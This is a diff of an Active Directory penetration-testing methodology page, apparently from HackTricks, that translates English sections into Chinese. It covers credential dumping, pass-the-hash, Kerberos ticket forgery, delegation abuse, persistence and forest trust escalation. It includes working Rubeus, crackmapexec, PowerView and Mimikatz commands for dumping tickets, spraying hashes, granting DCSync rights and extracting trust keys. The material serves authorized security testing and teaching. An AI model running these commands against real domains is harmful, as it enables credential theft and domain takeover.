-If you have compromised credentials or a session as a regular domain user and you have **access** with this user to **any machine in the domain** you should try to find your way to **escalate privileges locally and looting for credentials**. This is because only with local administrator privileges you will be able to **dump hashes of other users** in memory (LSASS) and locally (SAM).
+如果你已经妥协了凭证或作为普通域用户的会话，并且你可以 **使用该用户访问域中的任何机器**，你应该尝试找到 **本地提升权限和寻找凭证的方法**。这是因为只有拥有本地管理员权限，你才能 **在内存中（LSASS）和本地（SAM）转储其他用户的哈希**。
 
-There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a [**checklist**](../checklist-windows-privilege-escalation.md). Also, don't forget to use [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
+本书中有一整页关于 [**Windows 中的本地权限提升**](../windows-local-privilege-escalation/) 和一个 [**检查表**](../checklist-windows-privilege-escalation.md)。此外，不要忘记使用 [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)。
 
-### Current Session Tickets
-
-It's very **unlikely** that you will find **tickets** in the current user **giving you permission to access** unexpected resources, but you could check:
+### 当前会话票证
 
+你很 **不太可能** 在当前用户中找到 **票证**，使你能够访问意外的资源，但你可以检查：
 ```bash
 ## List all tickets (if not admin, only current user tickets)
 .\Rubeus.exe triage
@@ -208,20 +203,19 @@ It's very **unlikely** that you will find **tickets** in the current user **givi
 .\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
 [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
 ```
-
 ### NTML Relay
 
-If you have managed to enumerate the active directory you will have **more emails and a better understanding of the network**. You might be able to to force NTML [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
+如果你已经成功枚举了活动目录，你将会有**更多的电子邮件和对网络的更好理解**。你可能能够强制进行 NTML [**中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**。**
 
-### **Looks for Creds in Computer Shares**
+### **在计算机共享中寻找凭据**
 
-Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
+现在你有了一些基本凭据，你应该检查是否能**找到**任何**在 AD 中共享的有趣文件**。你可以手动进行，但这是一项非常无聊的重复任务（如果你发现数百个需要检查的文档，更是如此）。
 
-[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb/#domain-shared-folders-search)
+[**点击此链接了解你可以使用的工具。**](../../network-services-pentesting/pentesting-smb/#domain-shared-folders-search)
 
-### Steal NTLM Creds
+### 偷取 NTLM 凭据
 
-If you can **access other PCs or shares** you could **place files** (like a SCF file) that if somehow accessed will t**rigger an NTML authentication against you** so you can **steal** the **NTLM challenge** to crack it:
+如果你能**访问其他 PC 或共享**，你可以**放置文件**（如 SCF 文件），如果以某种方式被访问，将会**触发对你的 NTML 认证**，这样你就可以**窃取** **NTLM 挑战**以破解它：
 
 {{#ref}}
 ../ntlm/places-to-steal-ntlm-creds.md
@@ -229,114 +223,80 @@ If you can **access other PCs or shares** you could **place files** (like a SCF
 
 ### CVE-2021-1675/CVE-2021-34527 PrintNightmare
 
-This vulnerability allowed any authenticated user to **compromise the domain controller**.
+此漏洞允许任何经过身份验证的用户**破坏域控制器**。
 
 {{#ref}}
 printnightmare.md
 {{#endref}}
 
-## Privilege escalation on Active Directory WITH privileged credentials/session
-
-**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
-
-### Hash extraction
-
-Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/).\
-Then, its time to dump all the hashes in memory and locally.\
-[**Read this page about different ways to obtain the hashes.**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
-
-### Pass the Hash
-
-**Once you have the hash of a user**, you can use it to **impersonate** it.\
-You need to use some **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.\
-[**Read this page for more information.**](../ntlm/#pass-the-hash)
-
-### Over Pass the Hash/Pass the Key
-
-This attack aims to **use the user NTLM hash to request Kerberos tickets**, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially **useful in networks where NTLM protocol is disabled** and only **Kerberos is allowed** as authentication protocol.
-
-{{#ref}}
-over-pass-the-hash-pass-the-key.md
-{{#endref}}
-
-### Pass the Ticket
-
-In the **Pass The Ticket (PTT)** attack method, attackers **steal a user's authentication ticket** instead of their password or hash values. This stolen ticket is then used to **impersonate the user**, gaining unauthorized access to resources and services within a network.
-
-{{#ref}}
-pass-the-ticket.md
-{{#endref}}
-
-### Credentials Reuse
-
-If you have the **hash** or **password** of a **local administrato**r you should try to **login locally** to other **PCs** with it.
+## 使用特权凭据/会话在活动目录上进行特权提升
 
+**对于以下技术，普通域用户是不够的，你
 ```bash
 # Local Auth Spray (once you found some local admin pass or hash)
 ## --local-auth flag indicate to only try 1 time per machine
 crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
 ```
-
 > [!WARNING]
-> Note that this is quite **noisy** and **LAPS** would **mitigate** it.
+> 请注意，这非常**嘈杂**，并且**LAPS**会**减轻**它。
 
-### MSSQL Abuse & Trusted Links
+### MSSQL 滥用与受信任链接
 
-If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\
-Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.\
-**The links between databases work even across forest trusts.**
+如果用户有权限**访问 MSSQL 实例**，他可能能够利用它在 MSSQL 主机上**执行命令**（如果以 SA 身份运行），**窃取** NetNTLM **哈希**，甚至执行**中继****攻击**。\
+此外，如果一个 MSSQL 实例被另一个 MSSQL 实例信任（数据库链接）。如果用户对受信任的数据库有权限，他将能够**利用信任关系在另一个实例中执行查询**。这些信任可以链式连接，在某些情况下，用户可能能够找到一个配置错误的数据库，在那里他可以执行命令。\
+**数据库之间的链接甚至可以跨森林信任工作。**
 
 {{#ref}}
 abusing-ad-mssql.md
 {{#endref}}
 
-### Unconstrained Delegation
+### 不受限制的委托
 
-If you find any Computer object with the attribute [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer.\
-So, if a **Domain Admin logins onto the computer**, you will be able to dump his TGT and impersonate him using [Pass the Ticket](pass-the-ticket.md).\
-Thanks to constrained delegation you could even **automatically compromise a Print Server** (hopefully it will be a DC).
+如果您发现任何具有属性 [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) 的计算机对象，并且您在计算机上具有域权限，您将能够从登录到该计算机的每个用户的内存中转储 TGT。\
+因此，如果**域管理员登录到计算机**，您将能够转储他的 TGT，并使用 [Pass the Ticket](pass-the-ticket.md) 冒充他。\
+由于受限委托，您甚至可以**自动妥协打印服务器**（希望它是 DC）。
 
 {{#ref}}
 unconstrained-delegation.md
 {{#endref}}
 
-### Constrained Delegation
+### 受限委托
 
-If a user or computer is allowed for "Constrained Delegation" it will be able to **impersonate any user to access some services in a computer**.\
-Then, if you **compromise the hash** of this user/computer you will be able to **impersonate any user** (even domain admins) to access some services.
+如果用户或计算机被允许进行“受限委托”，它将能够**冒充任何用户以访问计算机中的某些服务**。\
+然后，如果您**妥协**此用户/计算机的哈希，您将能够**冒充任何用户**（甚至是域管理员）以访问某些服务。
 
 {{#ref}}
 constrained-delegation.md
 {{#endref}}
 
-### Resourced-based Constrain Delegation
+### 基于资源的受限委托
 
-Having **WRITE** privilege on an Active Directory object of a remote computer enables the attainment of code execution with **elevated privileges**:
+在远程计算机的 Active Directory 对象上拥有**写入**权限可以实现**提升权限**的代码执行：
 
 {{#ref}}
 resource-based-constrained-delegation.md
 {{#endref}}
 
-### ACLs Abuse
+### ACL 滥用
 
-The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
+被妥协的用户可能对某些域对象拥有一些**有趣的权限**，这可能让您**横向移动**/**提升**权限。
 
 {{#ref}}
 acl-persistence-abuse/
 {{#endref}}
 
-### Printer Spooler service abuse
+### 打印机后台处理程序服务滥用
 
-Discovering a **Spool service listening** within the domain can be **abused** to **acquire new credentials** and **escalate privileges**.
+发现域内**后台处理程序服务**可以被**滥用**以**获取新凭据**并**提升权限**。
 
 {{#ref}}
 printers-spooler-service-abuse.md
 {{#endref}}
 
-### Third party sessions abuse
+### 第三方会话滥用
 
-If **other users** **access** the **compromised** machine, it's possible to **gather credentials from memory** and even **inject beacons in their processes** to impersonate them.\
-Usually users will access the system via RDP, so here you have how to performa couple of attacks over third party RDP sessions:
+如果**其他用户****访问**被**妥协**的机器，可能会**从内存中收集凭据**，甚至**在他们的进程中注入信标**以冒充他们。\
+通常用户会通过 RDP 访问系统，因此这里有如何对第三方 RDP 会话执行几种攻击的方法：
 
 {{#ref}}
 rdp-sessions-abuse.md
@@ -344,145 +304,145 @@ rdp-sessions-abuse.md
 
 ### LAPS
 
-**LAPS** provides a system for managing the **local Administrator password** on domain-joined computers, ensuring it's **randomized**, unique, and frequently **changed**. These passwords are stored in Active Directory and access is controlled through ACLs to authorized users only. With sufficient permissions to access these passwords, pivoting to other computers becomes possible.
+**LAPS** 提供了一种管理域加入计算机上**本地管理员密码**的系统，确保其**随机化**、唯一且频繁**更改**。这些密码存储在 Active Directory 中，访问通过 ACL 控制，仅限授权用户。拥有足够权限访问这些密码后，可以转向其他计算机。
 
 {{#ref}}
 laps.md
 {{#endref}}
 
-### Certificate Theft
+### 证书盗窃
 
-**Gathering certificates** from the compromised machine could be a way to escalate privileges inside the environment:
+**从被妥协的机器收集证书**可能是提升环境内权限的一种方式：
 
 {{#ref}}
 ad-certificates/certificate-theft.md
 {{#endref}}
 
-### Certificate Templates Abuse
+### 证书模板滥用
 
-If **vulnerable templates** are configured it's possible to abuse them to escalate privileges:
+如果配置了**易受攻击的模板**，则可以滥用它们以提升权限：
 
 {{#ref}}
 ad-certificates/domain-escalation.md
 {{#endref}}
 
-## Post-exploitation with high privilege account
+## 高权限账户的后期利用
 
-### Dumping Domain Credentials
+### 转储域凭据
 
-Once you get **Domain Admin** or even better **Enterprise Admin** privileges, you can **dump** the **domain database**: _ntds.dit_.
+一旦您获得**域管理员**或更好的**企业管理员**权限，您可以**转储**域数据库：_ntds.dit_。
 
-[**More information about DCSync attack can be found here**](dcsync.md).
+[**有关 DCSync 攻击的更多信息可以在这里找到**](dcsync.md)。
 
-[**More information about how to steal the NTDS.dit can be found here**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
+[**有关如何窃取 NTDS.dit 的更多信息可以在这里找到**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
 
-### Privesc as Persistence
+### 权限提升作为持久性
 
-Some of the techniques discussed before can be used for persistence.\
-For example you could:
+之前讨论的一些技术可以用于持久性。\
+例如，您可以：
 
-- Make users vulnerable to [**Kerberoast**](kerberoast.md)
+- 使用户易受[**Kerberoast**](kerberoast.md)攻击
 
-  ```powershell
-  Set-DomainObject -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}r
-  ```
+```powershell
+Set-DomainObject -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}r
+```
 
-- Make users vulnerable to [**ASREPRoast**](asreproast.md)
+- 使用户易受[**ASREPRoast**](asreproast.md)攻击
 
-  ```powershell
-  Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
-  ```
+```powershell
+Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
+```
 
-- Grant [**DCSync**](./#dcsync) privileges to a user
+- 授予用户[**DCSync**](./#dcsync)权限
 
-  ```powershell
-  Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdentity bfarmer -Rights DCSync
-  ```
+```powershell
+Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdentity bfarmer -Rights DCSync
+```
 
-### Silver Ticket
+### 银票
 
-The **Silver Ticket attack** creates a **legitimate Ticket Granting Service (TGS) ticket** for a specific service by using the **NTLM hash** (for instance, the **hash of the PC account**). This method is employed to **access the service privileges**.
+**银票攻击**为特定服务创建**合法的票据授予服务（TGS）票据**，使用**NTLM 哈希**（例如，**PC 账户的哈希**）。此方法用于**访问服务权限**。
 
 {{#ref}}
 silver-ticket.md
 {{#endref}}
 
-### Golden Ticket
+### 金票
 
-A **Golden Ticket attack** involves an attacker gaining access to the **NTLM hash of the krbtgt account** in an Active Directory (AD) environment. This account is special because it's used to sign all **Ticket Granting Tickets (TGTs)**, which are essential for authenticating within the AD network.
+**金票攻击**涉及攻击者在 Active Directory (AD) 环境中获取**krbtgt 账户的 NTLM 哈希**。该账户是特殊的，因为它用于签署所有**票据授予票据（TGTs）**，这些票据对于在 AD 网络中进行身份验证至关重要。
 
-Once the attacker obtains this hash, they can create **TGTs** for any account they choose (Silver ticket attack).
+一旦攻击者获得此哈希，他们可以为他们选择的任何账户创建**TGTs**（银票攻击）。
 
 {{#ref}}
 golden-ticket.md
 {{#endref}}
 
-### Diamond Ticket
+### 钻石票
 
-These are like golden tickets forged in a way that **bypasses common golden tickets detection mechanisms.**
+这些就像金票，以一种**绕过常见金票检测机制**的方式伪造。
 
 {{#ref}}
 diamond-ticket.md
 {{#endref}}
 
-### **Certificates Account Persistence**
+### **证书账户持久性**
 
-**Having certificates of an account or being able to request them** is a very good way to be able to persist in the users account (even if he changes the password):
+**拥有账户的证书或能够请求它们**是能够在用户账户中持久存在的非常好方法（即使他更改密码）：
 
 {{#ref}}
 ad-certificates/account-persistence.md
 {{#endref}}
 
-### **Certificates Domain Persistence**
+### **证书域持久性**
 
-**Using certificates is also possible to persist with high privileges inside the domain:**
+**使用证书也可以在域内以高权限持久存在：**
 
 {{#ref}}
 ad-certificates/domain-persistence.md
 {{#endref}}
 
-### AdminSDHolder Group
+### AdminSDHolder 组
 
-The **AdminSDHolder** object in Active Directory ensures the security of **privileged groups** (like Domain Admins and Enterprise Admins) by applying a standard **Access Control List (ACL)** across these groups to prevent unauthorized changes. However, this feature can be exploited; if an attacker modifies the AdminSDHolder's ACL to give full access to a regular user, that user gains extensive control over all privileged groups. This security measure, meant to protect, can thus backfire, allowing unwarranted access unless closely monitored.
+Active Directory 中的**AdminSDHolder**对象通过在这些组中应用标准**访问控制列表（ACL）**来确保**特权组**（如域管理员和企业管理员）的安全，以防止未经授权的更改。然而，这一功能可以被利用；如果攻击者修改 AdminSDHolder 的 ACL 以授予普通用户完全访问权限，该用户将获得对所有特权组的广泛控制。这个本应保护的安全措施因此可能适得其反，允许不当访问，除非进行严格监控。
 
-[**More information about AdminDSHolder Group here.**](privileged-groups-and-token-privileges.md#adminsdholder-group)
+[**有关 AdminDSHolder 组的更多信息。**](privileged-groups-and-token-privileges.md#adminsdholder-group)
 
-### DSRM Credentials
+### DSRM 凭据
 
-Inside every **Domain Controller (DC)**, a **local administrator** account exists. By obtaining admin rights on such a machine, the local Administrator hash can be extracted using **mimikatz**. Following this, a registry modification is necessary to **enable the use of this password**, allowing for remote access to the local Administrator account.
+在每个**域控制器（DC）**内部，存在一个**本地管理员**账户。通过在这样的机器上获得管理员权限，可以使用**mimikatz**提取本地管理员哈希。随后，需要进行注册表修改以**启用使用此密码**，从而允许远程访问本地管理员账户。
 
 {{#ref}}
 dsrm-credentials.md
 {{#endref}}
 
-### ACL Persistence
+### ACL 持久性
 
-You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.
+您可以**给予**某个**用户**对某些特定域对象的**特殊权限**，这将使该用户**在未来提升权限**。
 
 {{#ref}}
 acl-persistence-abuse/
 {{#endref}}
 
-### Security Descriptors
+### 安全描述符
 
-The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
+**安全描述符**用于**存储**对象对另一个对象的**权限**。如果您只需对对象的**安全描述符**进行**小改动**，就可以在不需要成为特权组成员的情况下获得对该对象的非常有趣的权限。
 
 {{#ref}}
 security-descriptors.md
 {{#endref}}
 
-### Skeleton Key
+### 骨架密钥
 
-Alter **LSASS** in memory to establish a **universal password**, granting access to all domain accounts.
+在内存中更改**LSASS**以建立**通用密码**，授予对所有域账户的访问权限。
 
 {{#ref}}
 skeleton-key.md
 {{#endref}}
 
-### Custom SSP
+### 自定义 SSP
 
-[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
-You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.\\
+[了解什么是 SSP（安全支持提供者）这里。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
+您可以创建自己的**SSP**以**捕获**用于访问机器的**凭据**的**明文**。\\
 
 {{#ref}}
 custom-ssp.md
@@ -490,77 +450,76 @@ custom-ssp.md
 
 ### DCShadow
 
-It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
-Note that if you use wrong data, pretty ugly logs will appear.
+它在 AD 中注册一个**新的域控制器**，并使用它在指定对象上**推送属性**（SIDHistory、SPNs...），**不留**任何关于**修改**的**日志**。您**需要 DA** 权限并在**根域**内。\
+请注意，如果您使用错误的数据，会出现相当丑陋的日志。
 
 {{#ref}}
 dcshadow.md
 {{#endref}}
 
-### LAPS Persistence
+### LAPS 持久性
 
-Previously we have discussed about how to escalate privileges if you have **enough permission to read LAPS passwords**. However, these passwords can also be used to **maintain persistence**.\
-Check:
+之前我们讨论了如果您有**足够的权限读取 LAPS 密码**，如何提升权限。然而，这些密码也可以用于**维持持久性**。\
+检查：
 
 {{#ref}}
 laps.md
 {{#endref}}
 
-## Forest Privilege Escalation - Domain Trusts
+## 森林权限提升 - 域信任
 
-Microsoft views the **Forest** as the security boundary. This implies that **compromising a single domain could potentially lead to the entire Forest being compromised**.
+微软将**森林**视为安全边界。这意味着**妥协单个域可能导致整个森林被妥协**。
 
-### Basic Information
+### 基本信息
 
-A [**domain trust**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>) is a security mechanism that enables a user from one **domain** to access resources in another **domain**. It essentially creates a linkage between the authentication systems of the two domains, allowing authentication verifications to flow seamlessly. When domains set up a trust, they exchange and retain specific **keys** within their **Domain Controllers (DCs)**, which are crucial to the trust's integrity.
+[**域信任**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>)是一种安全机制，使来自一个**域**的用户能够访问另一个**域**中的资源。它本质上在两个域的身份验证系统之间创建了一个链接，允许身份验证验证无缝流动。当域设置信任时，它们在其**域控制器（DCs）**中交换并保留特定的**密钥**，这些密钥对信任的完整性至关重要。
 
-In a typical scenario, if a user intends to access a service in a **trusted domain**, they must first request a special ticket known as an **inter-realm TGT** from their own domain's DC. This TGT is encrypted with a shared **key** that both domains have agreed upon. The user then presents this TGT to the **DC of the trusted domain** to get a service ticket (**TGS**). Upon successful validation of the inter-realm TGT by the trusted domain's DC, it issues a TGS, granting the user access to the service.
+在典型场景中，如果用户打算访问**受信任域**中的服务，他们必须首先从自己域的 DC 请求一个称为**跨领域 TGT**的特殊票据。此 TGT 使用两个域已达成一致的共享**密钥**进行加密。然后，用户将此 TGT 提交给**受信任域的 DC**以获取服务票据（**TGS**）。在受信任域的 DC 成功验证跨领域 TGT 后，它会发出 TGS，授予用户访问该服务的权限。
 
-**Steps**:
+**步骤**：
 
-1. A **client computer** in **Domain 1** starts the process by using its **NTLM hash** to request a **Ticket Granting Ticket (TGT)** from its **Domain Controller (DC1)**.
-2. DC1 issues a new TGT if the client is authenticated successfully.
-3. The client then requests an **inter-realm TGT** from DC1, which is needed to access resources in **Domain 2**.
-4. The inter-realm TGT is encrypted with a **trust key** shared between DC1 and DC2 as part of the two-way domain trust.
-5. The client takes the inter-realm TGT to **Domain 2's Domain Controller (DC2)**.
-6. DC2 verifies the inter-realm TGT using its shared trust key and, if valid, issues a **Ticket Granting Service (TGS)** for the server in Domain 2 the client wants to access.
-7. Finally, the client presents this TGS to the server, which is encrypted with the server’s account hash, to get access to the service in Domain 2.
+1. **域 1**中的**客户端计算机**开始该过程，使用其**NTLM 哈希**向其**域控制器（DC1）**请求**票据授予票据（TGT）**。
+2. 如果客户端成功通过身份验证，DC1 将发出新的 TGT。
+3. 然后，客户端向 DC1 请求一个**跨领域 TGT**，该 TGT 是访问**域 2**中的资源所需的。
+4. 跨领域 TGT 使用作为双向域信任的一部分在 DC1 和 DC2 之间共享的**信任密钥**进行加密。
+5. 客户端将跨领域 TGT 带到**域 2 的域控制器（DC2）**。
+6. DC2 使用其共享的信任密钥验证跨领域 TGT，如果有效，则为客户端希望访问的域 2 中的服务器发出**票据授予服务（TGS）**。
+7. 最后，客户端将此 TGS 提交给服务器，该 TGS 使用服务器的账户哈希进行加密，以获取对域 2 中服务的访问权限。
 
-### Different trusts
+### 不同的信任
 
-It's important to notice that **a trust can be 1 way or 2 ways**. In the 2 ways options, both domains will trust each other, but in the **1 way** trust relation one of the domains will be the **trusted** and the other the **trusting** domain. In the last case, **you will only be able to access resources inside the trusting domain from the trusted one**.
+重要的是要注意，**信任可以是单向或双向**。在双向选项中，两个域将相互信任，但在**单向**信任关系中，一个域将是**受信任**的，另一个是**信任**的域。在最后一种情况下，**您只能从受信任的域访问信任域内的资源**。
 
-If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
+如果域 A 信任域 B，A 是信任域，B 是受信任域。此外，在**域 A**中，这将是**出站信任**；在**域 B**中，这将是**入站信任**。
 
-**Different trusting relationships**
+**不同的信任关系**
 
-- **Parent-Child Trusts**: This is a common setup within the same forest, where a child domain automatically has a two-way transitive trust with its parent domain. Essentially, this means that authentication requests can flow seamlessly between the parent and the child.
-- **Cross-link Trusts**: Referred to as "shortcut trusts," these are established between child domains to expedite referral processes. In complex forests, authentication referrals typically have to travel up to the forest root and then down to the target domain. By creating cross-links, the journey is shortened, which is especially beneficial in geographically dispersed environments.
-- **External Trusts**: These are set up between different, unrelated domains and are non-transitive by nature. According to [Microsoft's documentation](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>), external trusts are useful for accessing resources in a domain outside of the current forest that isn't connected by a forest trust. Security is bolstered through SID filtering with external trusts.
-- **Tree-root Trusts**: These trusts are automatically established between the forest root domain and a newly added tree root. While not commonly encountered, tree-root trusts are important for adding new domain trees to a forest, enabling them to maintain a unique domain name and ensuring two-way transitivity. More information can be found in [Microsoft's guide](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>).
-- **Forest Trusts**: This type of trust is a two-way transitive trust between two forest root domains, also enforcing SID filtering to enhance security measures.
-- **MIT Trusts**: These trusts are established with non-Windows, [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domains. MIT trusts are a bit more specialized and cater to environments requiring integration with Kerberos-based systems outside the Windows ecosystem.
+- **父子信任**：这是同一森林内的常见设置，子域自动与其父域建立双向传递信任。这意味着身份验证请求可以在父域和子域之间无缝流动。
+- **交叉链接信任**：称为“快捷信任”，这些是在子域之间建立的，以加快引用过程。在复杂的森林中，身份验证引用通常必须向森林根部上行，然后再向目标域下行。通过创建交叉链接，旅程缩短，这在地理分散的环境中尤其有利。
+- **外部信任**：这些是在不同的、不相关的域之间建立的，通常是非传递性的。根据[微软的文档](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>)，外部信任对于访问当前森林外的域中的资源非常有用，该域未通过森林信任连接。通过 SID 过滤增强安全性。
+- **树根信任**：这些信任在森林根域和新添加的树根之间自动建立。虽然不常见，但树根信任对于将新域树添加到森林中非常重要，使它们能够保持唯一的域名并确保双向传递性。有关更多信息，请参见[微软的指南](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>)。
+- **森林信任**：这种类型的信任是两个森林根域之间的双向传递信任，也强制实施 SID 过滤以增强安全措施。
+- **MIT 信任**：这些信任与非 Windows 的[符合 RFC4120](https://tools.ietf.org/html/rfc4120) Kerberos 域建立。MIT 信任更为专业，适用于需要与 Windows 生态系统外的基于 Kerberos 的系统集成的环境。
 
-#### Other differences in **trusting relationships**
+#### **信任关系中的其他差异**
 
-- A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
-- A trust relationship can be set up as **bidirectional trust** (both trust each other) or as **one-way trust** (only one of them trust the other).
+- 信任关系也可以是**传递的**（A 信任 B，B 信任 C，则 A 信任 C）或**非传递的**。
+- 信任关系可以设置为**双向信任**（彼此信任）或**单向信任**（只有一个信任另一个）。
 
-### Attack Path
+### 攻击路径
 
-1. **Enumerate** the trusting relationships
-2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably).
-   1. kerberoast in this case could be another option.
-3. **Compromise** the **accounts** which can **pivot** through domains.
+1. **枚举**信任关系
+2. 检查是否有任何**安全主体**（用户/组/计算机）对**其他域**的资源具有**访问**权限，可能通过 ACE 条目或通过在其他域的组中查找。寻找**跨域关系**（信任可能是为此创建的）。
+1. 在这种情况下，kerberoast 可能是另一个选项。
+3. **妥协**可以**跨域**进行**转移**的**账户**。
 
-Attackers with could access to resources in another domain through three primary mechanisms:
+攻击者可以通过三种主要机制访问另一个域中的资源：
 
-- **Local Group Membership**: Principals might be added to local groups on machines, such as the “Administrators” group on a server, granting them significant control over that machine.
-- **Foreign Domain Group Membership**: Principals can also be members of groups within the foreign domain. However, the effectiveness of this method depends on the nature of the trust and the scope of the group.
-- **Access Control Lists (ACLs)**: Principals might be specified in an **ACL**, particularly as entities in **ACEs** within a **DACL**, providing them access to specific resources. For those looking to dive deeper into the mechanics of ACLs, DACLs, and ACEs, the whitepaper titled “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” is an invaluable resource.
-
-### Child-to-Parent forest privilege escalation
+- **本地组成员资格**：主体可能被添加到机器上的本地组中，例如服务器上的“管理员”组，从而授予他们对该机器的重大控制。
+- **外部域组成员资格**：主体也可以是外部域中组的成员。然而，此方法的有效性取决于信任的性质和组的范围。
+- **访问控制列表（ACLs）**：主体可能在**ACL**中被指定，特别是在**DACL**中的**ACE**内，提供对特定资源的访问权限。对于那些希望深入了解 ACL、DACL 和 ACE 机制的人，名为“[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)”的白皮书是一个宝贵的资源。
 
+### 子到父森林权限提升
 ```
 Get-DomainTrust
 
@@ -572,54 +531,52 @@ TrustDirection  : Bidirectional       --> Trust direction (2ways in this case)
 WhenCreated     : 2/19/2021 1:28:00 PM
 WhenChanged     : 2/19/2021 1:28:00 PM
 ```
-
 > [!WARNING]
-> There are **2 trusted keys**, one for _Child --> Parent_ and another one for _Parent_ --> _Child_.\
-> You can the one used by the current domain them with:
+> 有 **2 个受信任的密钥**，一个用于 _Child --> Parent_，另一个用于 _Parent_ --> _Child_。\
+> 您可以使用以下命令查看当前域使用的密钥：
 >
 > ```bash
 > Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
 > Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
 > ```
 
-#### SID-History Injection
+#### SID-History 注入
 
-Escalate as Enterprise admin to the child/parent domain abusing the trust with SID-History injection:
+通过 SID-History 注入，作为企业管理员提升到子/父域：
 
 {{#ref}}
 sid-history-injection.md
 {{#endref}}
 
-#### Exploit writeable Configuration NC
+#### 利用可写的配置 NC
 
-Understanding how the Configuration Naming Context (NC) can be exploited is crucial. The Configuration NC serves as a central repository for configuration data across a forest in Active Directory (AD) environments. This data is replicated to every Domain Controller (DC) within the forest, with writable DCs maintaining a writable copy of the Configuration NC. To exploit this, one must have **SYSTEM privileges on a DC**, preferably a child DC.
+理解如何利用配置命名上下文 (NC) 是至关重要的。配置 NC 作为 Active Directory (AD) 环境中配置数据的中央存储库。该数据会复制到森林中的每个域控制器 (DC)，可写的 DC 维护配置 NC 的可写副本。要利用这一点，必须在 DC 上拥有 **SYSTEM 权限**，最好是子 DC。
 
-**Link GPO to root DC site**
+**将 GPO 链接到根 DC 站点**
 
-The Configuration NC's Sites container includes information about all domain-joined computers' sites within the AD forest. By operating with SYSTEM privileges on any DC, attackers can link GPOs to the root DC sites. This action potentially compromises the root domain by manipulating policies applied to these sites.
